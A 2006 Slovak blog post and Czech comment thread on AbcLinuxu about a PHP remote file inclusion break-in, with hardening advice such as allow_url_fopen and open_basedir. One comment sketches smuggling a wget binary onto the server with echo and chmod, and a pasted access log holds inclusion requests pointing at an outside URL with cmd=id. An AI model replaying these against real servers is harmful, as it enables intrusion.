abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
Přihlášení | Registrace
×
napište » Zprávičky
inzerujte » Pracovní nabídky
    Virtuální Bastlírna vol. 59: Návrh polovodičů na FELu?
    dnes 12:22 | Pozvánky

    Co se děje ve zprávách, ví asi každý - válka sem, clo tam, demonstrace na jednu i druhou stranu a bastlíř už má pocit, že se snad ani nic jiného neděje. To by však byl velký omyl a Virtuální Bastlírna je zde jako každý měsíc, aby vytáhla na světlo světa události ze světa vědy a techniky. Připojte se tedy nezávaznému povídání Strahovského MacGyvera! Co se tam bude probírat? PCBWay začalo dělat průhledné plošňáky, MARS končí s výrobou skříněk, FEL

    … více »
    bkralik | Komentářů: 0
    Stát New York chce regulovat 3D tisk
    dnes 12:11 | IT novinky

    Guvernérka státu New York Kathy Hochul (Demokraté) plánuje novou legislativu, která by měla omezit výrobu 3D tištěných zbraní. Tento návrh zákona zavádí povinnost pro všechny 3D tiskárny prodávané ve státě New York obsahovat 'software' bránící ve výrobě zbraní. Návrh zákona rovněž zakazuje lidem sdílet 'digitální plány zbraní' (blueprinty) bez povolení. Existují důvodné obavy, že se tento nešťastný nápad může šířit do dalších zemí a ovlivnit celý 3D tisk jako takový. Ostatně, s podobnou regulací nedávno přišel i stát Washington.

    NUKE GAZA! 🎆 | Komentářů: 4
    Vývoj webového prohlížeče Ladybird (12/2025 a 01/2026)
    dnes 05:11 | Komunita

    Na čem pracují vývojáři webového prohlížeče Ladybird (GitHub)? Byl publikován přehled vývoje za prosinec 2025 a leden 2026 (YouTube). Zajímavé, že i v roce 2026 celou řadu problémů vyřeší falšování řetězce User-Agent.

    Ladislav Hagara | Komentářů: 2
    Linux From Scratch (LFS) už pouze se systemd
    včera 20:11 | Komunita

    Bylo rozhodnuto, že Linux From Scratch (LFS) končí s podporou System V init. Nové verze knih s návody na instalaci vlastního linuxového systému ze zdrojových kódů už budou pouze se systemd.

    Ladislav Hagara | Komentářů: 6
    ScummVM 2026.1.0 "Like a Version"
    včera 17:00 | Nová verze

    Byla vydána nová verze 2026.1.0 "Like a Version" svobodného softwaru ScummVM (Wikipedie) umožňujícího bezproblémový běh mnoha klasických adventur na zařízeních, pro které nebyly nikdy určeny. Přehled novinek v poznámkách k vydání a na GitHubu. Změněno bylo číslování verzí. Předchozí verze byla 2.9.1.

    Ladislav Hagara | Komentářů: 2
    Ve Firefoxu půjde snáz vypnout AI
    včera 14:55 | IT novinky

    Internetový prohlížeč Firefox bude mít nové ovládací prvky pro umělou inteligenci, které umožní uživatelům vypnout vestavěné AI funkce přímo v nastavení prohlížeče. Jednotlivě půjde vypnout nebo zapnout automatické překlady stránek, generovaní popisného textu k obrázkům v otevřených PDF dokumentech, samoorganizaci tabů do skupin, náhledy odkazů s krátkým shrnutím a boční panel s chatbotem. Tyto možnosti v nastavení prohlížeče

    … více »
    NUKE GAZA! 🎆 | Komentářů: 8
    KDE Plasma Login Manager vyžaduje systemd
    včera 14:44 | IT novinky

    Desktopové prostředí KDE Plasma 6.6, která je právě ve fázi beta, nahrazuje stávající SDDM novým Plasma Login Managerem, který je ale pevně navázán na systemd. Plasma Login Manager využívá systemd-logind a další součásti systemd, které nejsou dostupné v operačních systémech bez systemd, jako je například FreeBSD, případně jsou linuxové distribuce Gentoo, Void Linux anebo Alpine Linux. Pro uživatele zatím stále ještě existuje možnost používat SDDM.

    NUKE GAZA! 🎆 | Komentářů: 6
    Záznamy přednášek ze setkání CSNOG 2026 jsou dostupné online
    včera 14:33 | Komunita

    Na webu komunitního setkání CSNOG 2026 jsou dostupné prezentace v PDF, jejich videozáznamy a fotografie z lednové akce ve Zlíně. CSNOG 2026 se zúčastnilo téměř 300 zájemců o vystoupení věnovaných správě sítí, legislativním a regulačním tématům nebo projektům z akademické sféry. Letos byly prezentace rozdělené do dvou treků, ve kterých se představilo 35 přednášejících. Setkání komunity CSNOG organizují společně sdružení CESNET, CZ.NIC a NIX.CZ.

    VSladek | Komentářů: 1
    Muskova vesmírná firma SpaceX koupila jeho další firmu xAI
    včera 11:33 | IT novinky

    Americká vesmírná společnost SpaceX miliardáře Elona Muska koupila další Muskovu firmu xAI, která se zabývá vývojem umělé inteligence (AI). Informovala o tom na svém účtu na síti 𝕏. Musk tímto krokem propojí několik ze svých služeb, včetně chatbota s prvky umělé inteligence Grok, sociální sítě 𝕏 či satelitního internetového systému Starlink. Tržní hodnota společnosti SpaceX dosahuje jednoho bilionu dolarů (20,6 bilionu Kč), hodnota xAI pak činí 250 miliard dolarů.

    Ladislav Hagara | Komentářů: 3
    Hack Notepad++
    2.2. 23:22 | Bezpečnostní upozornění

    Byl odhalen supply chain attack na Notepad++: útočníci kompromitovali hosting Notepad++ a vybrané dotazy na aktualizace přesměrovávali na servery pod jejich kontrolou. Doporučuje se stáhnout instalátor a přeinstalovat.

    a1bert | Komentářů: 10
    Centrum | Napsat | Starší
    navrhněte » Anketa
    Které desktopové prostředí na Linuxu používáte?
     (18%)
     (6%)
     (0%)
     (10%)
     (25%)
     (3%)
     (5%)
     (2%)
     (12%)
     (30%)
    Celkem 749 hlasů
     Komentářů: 25, poslední včera 19:50
    Rozcestník
    AbcLinuxu
    HDmag.cz
    xadam - adam
    Aktuální zápisy
    ?Přístup k archivovaným zápisům za jednotlivé měsíce. Archív

    ?Přístup na osobní hlavní stranu a na hlavní stranu všech blogů. Navigace
    Nej blogů na AbcLinuxu
    Nejčtenější za poslední měsíc Nejkomentovanější za poslední měsíc
    AbcLinuxu:/ Blogy / adam / Linux / Pár dní po hackerskom útoku
    Štítky: Apache, databáze, FTP, IDE, Internet, KDE, MySQL, PHP, programování, stahování, wget

    Pár dní po hackerskom útoku

    11.7.2006 02:13 | Přečteno: 1748× | Linux | poslední úprava: 11.7.2006 02:14

    Viem že je na hanbu keď vám niekto napadne webový server na ktorom závisí množstvo informácií a pri ktorom ste strávili nemalé množstvo času. Podarilo sa nám odhaliť útok, ktorý bol smerovaný na náš server za pomoci diery v jednej web-stránke z množstva u nás prevádzkovaných.


    V nedeľu som si s kolegom prezeral logy servera a čo to zrazu vidíme. Niekto sa snažil skoro týždeň o script injection a vcelku úspešne...

    Prišli sme na to že v skriptoch jednej stránky sa nachádza diera, ktorá umožňuje jednoduchým zadaním parametra za adresou vkladať cestu ku skriptom ktoré sa nachádzajú na druhom serveri niekde vo svete a následne ich interpretovať na našom servery.
    Za pomoci takejto diery sa útočníkovi podarilo interpretovať shell príkazy, takže si vytvoril najskôr v /temp svoje adresáre, tu sa mu podarilo vytvoriť si vlastne ftp, pravdaže zdrojáky si stiahol pomocou wget a skompiloval. Prezrel celu štruktúru systému a našiel si vhodne miestečko kde ukladal dáta ktoré si neskôr vyzdvihoval (filmy, mp3..) Keďže mame priame pripojenie k optike, máme výhodnú rýchlosť pripojenia a vcelku dosť priestoru na diskoch, útočník mal možno menšiu rýchlosť. Podľa obsahu ktorí hromadil sme usúdili že ide pravdepodobne o taliana (nieže by bol talian, ale vyznal sa dosť :)


    Chcem sa spýtať. Aké mate skúsenosti so zabezpečením servera a ako by ste riešili podobnú situáciu? Ako sa jej dá predísť s ohľadom na to že na serveri mate veľké množstvo webových stránok rôznych užívateľov, kde nastáva problem s ošetrením chyb v skriptoch interpretovaných na servery a umožňujúcich použitie script injection. Aká kombinácia verzií Apache, PHP a MySQL je vhodná a s akými nastaveniami?

    Ďakujem za každú reakciu :)

           

    Hodnocení: 100 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Nástroje: Začni sledovat (3) ?Zašle upozornění na váš email při vložení nového komentáře. , Tisk

    Vložit další komentář

    11.7.2006 02:58 Creckx | skóre: 23 | blog: cxblog | Lanškroun
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Už je to dlouho co jsem si hrál s nastavováním PHP. Nemá náhodou něco jako SafeMode, kterej znepřístupní nebezpečné fce? Jinak bych to neřešil :) DoS útoky jsou větší hnus, tohle je ještě sranda :)
    Můj blog Pokud máte taky blog, můžeme vyměnit odkazy :)
    12.7.2006 14:50 xadam | skóre: 1 | blog: adam
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Ano to je pravda, mal som moznost vidiet jadan priebeh organizovaneho DOS utoku. Bol tam paradny trafik, niekolko sto megabit :)
    12.7.2006 17:16 Creckx | skóre: 23 | blog: cxblog | Lanškroun
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Šéf jen co zapojil server do sítě tak stovky IP adres se začalo dotazovat. Pěkně přes POST tlačily data :)
    Můj blog Pokud máte taky blog, můžeme vyměnit odkazy :)
    11.7.2006 06:59 Ladislav Sückr | skóre: 21
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

    Ten wget a kompilátor máte na produkčním serveru?

    Myslet špatně je lepší než nemyslet vůbec.
    11.7.2006 08:08 Filip Jirsák | skóre: 67 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Třeba s Gentoo je docela problém nemít wget a kompilátor. I když taky to jde, samozřejmě…

    Spíš je IMHO důležité útočníka na server vůbec nepustit. Když už může vykonávat shell skripty kdekoliv z internetu, není pro něj problém vykonávat po částech shell script 
    echo "blabla" > wget
echo "bleble" >> wget
chmod u+x wget
    A takhle si na server poslat svou kopii staticky slinkovaného wgetu. A tím si pak stáhnout kompilátor.
    David Watzke avatar 11.7.2006 11:23 David Watzke | skóre: 74 | blog: Blog... | Praha
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Gentoo bez kompilátoru je jako ryba bez vody, herní stanice bez monitoru, já bez počítače, nebo prdel bez hrnce - nemožný :-)
    “Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
    Heron avatar 11.7.2006 11:39 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Ale tady jde o komerční server, ne o hračku pro děti ;-)
    Heron
    David Watzke avatar 11.7.2006 11:54 David Watzke | skóre: 74 | blog: Blog... | Praha
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Ňákej vostrej ... ;-)
    “Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
    11.7.2006 12:26 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Fakt? To nejde ani přeložit balíčky jinde a na serveru instalovat binární verze?
    When your hammer is C++, everything begins to look like a thumb.
    David Watzke avatar 11.7.2006 12:31 David Watzke | skóre: 74 | blog: Blog... | Praha
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Jasně že jde, ale víš jak to myslím. Je to proti přírodě :-D Taky můžeš mít herní stanici bez monitoru.
    “Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
    11.7.2006 12:31 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Samozdrejme, ze to de, jenom to nedela.
    12.7.2006 01:01 Ondřej Čečák | skóre: 33
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    To mi jako problem nepripada, vzhledem k tomu, ze si ten wget muzu treba pomoci diry v PHP na system protlacit a pak si cokoli dalsiho treba zkompilovat a stahnout -- rychle a celkem elegantne.
    -- "Ja vim, on vi, ty pico!"
    11.7.2006 08:02 Filip Jirsák | skóre: 67 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Především by web server neměl běžet s právy roota, ale pod nějakým uživatelem, kterému vhodně omezím přístup.
    11.7.2006 10:05 Aldagautr | skóre: 20
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    muzes zacit tady
    o svobodu prichazi nejsnaze ten, kdo o ni nikdy nebojoval
    11.7.2006 11:10 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Protoze potrebuji tahat nektere stranky online z jineho serveru tak jsem server zabezpecil tak, ze jsem v iptables zakazal odchozi spojeni na vsechny krome vybranych serveru (DNS, SMTP a par dalsich). Bohuzel si myslim, ze kdyz clovek provozuje PHP aplikace tretich stran, tak si nikdy nemuze byt jisty, ze na serveru nema diru :-(. Takze mozna neco jako bezici snort, semtam skusit nessus (stalo se mi, ze mi rekl o dire ktera byla v jedne aplikaci co provozuji), pravidelne zalohovat a modlit se :-(. Doufam, ze me nikdo za to co delam neukamenuje (nemyslim si, ze jsem dobry administrator, sem spise programator a tak ten server i vypada, ale snazim se).
    11.7.2006 23:56 Jakub Suchy | skóre: 22 | Praha
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Staci v php.ini dat allow_url_fopen Off a open_basedir na domovsky adresar uzivatele a /tmp. bohuzel je to nutne udelat per virtualhost...
    Drupal
    11.7.2006 11:28 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    Jeste pro pobaveni jak jsem si zabezpecit server (pouzivaji ho jen ostatni servery pro autentizaci uzivatelu) . Tak jsem ho zabezpecoval pres iptables, az se mi podarilo zabit ssh port. To by nebylo tak hrozne, kdyby jsem k tomu serveru mel pripojenou klavesnici a monitor. Zatim sem se jeste nedokopal k tomu, abych to obnovil :-)
    12.7.2006 22:24 xadam | skóre: 1 | blog: adam
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    asi ti pristup k tomu serveru nechyba ze? ...:) Mame spravene tiez iptablesy, je to vcelku dobra vec. Ale pri velkom pocte pocitacov clovek obcas na nieco zabudne, lebo robi moc rychlo ked je vela inej prace ;)
    11.7.2006 23:32 diverman | skóre: 32 | blog: život s tučňáčkem
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    To se mi taky stalo, zalozil jsem u sebe docasny ucet se stejnym jmenem a heslem, ktery jsem potom zapomel vymazat. A on si tam wgetem stahl nejaky scannery, brutal-forcy atd... Vic se nestalo. A zapomel po sobe vymazat .bash_history :-)
    deb http://ftp.cz.debian.org/debian jessie main contrib non-free
    12.7.2006 02:46 k3 | skóre: 15 | blog:  
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    krom toho, ze to vypada na slusnou lamu tak to nedela jen pro zabavu... mezi tema jeho vecma se da najit par divnejch veci.. napr ebay.zip moc jsem toho teda nestahl.. kdyz jsem si to chtel zmirrorovat tak na te sajte dosel traffic limit :(
    10.11.2006 15:07 xadam | skóre: 1 | blog: adam
    Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku
    stle sa vedu utoky podobneho charakteru. prikladam vypis z konzoly (access_log) apache 
    more /var/log/apache/access_log | grep http:// | grep 10/Nov/2006
82.7.25.196 - - [10/Nov/2006:00:18:21 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
70.42.51.20 - - [10/Nov/2006:01:58:54 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
193.179.220.253 - - [10/Nov/2006:06:34:23 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
84.47.91.200 - - [10/Nov/2006:08:34:44 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
193.87.64.155 - - [10/Nov/2006:09:15:21 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.0" 200 72
195.91.54.84 - - [10/Nov/2006:12:56:18 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
195.49.188.227 - - [10/Nov/2006:12:59:30 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.0" 200 72
151.56.239.254 - - [10/Nov/2006:14:21:32 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
151.56.239.254 - - [10/Nov/2006:14:21:34 +0100] "GET /index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
151.56.239.254 - - [10/Nov/2006:14:21:35 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:58:30 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:58:58 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:59:00 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:15:03:45 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:15:04:32 +0100] "GET //index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
193.87.65.21 - - [10/Nov/2006:15:04:44 +0100] "GET //index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
193.87.65.21 - - [10/Nov/2006:15:05:24 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608

    Založit nové vláknoNahoru

    Píšeme jinde
    ISSN 1214-1267   www.czech-server.cz
    Redakce | Inzerce | Podmínky použití | Osobní údaje
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.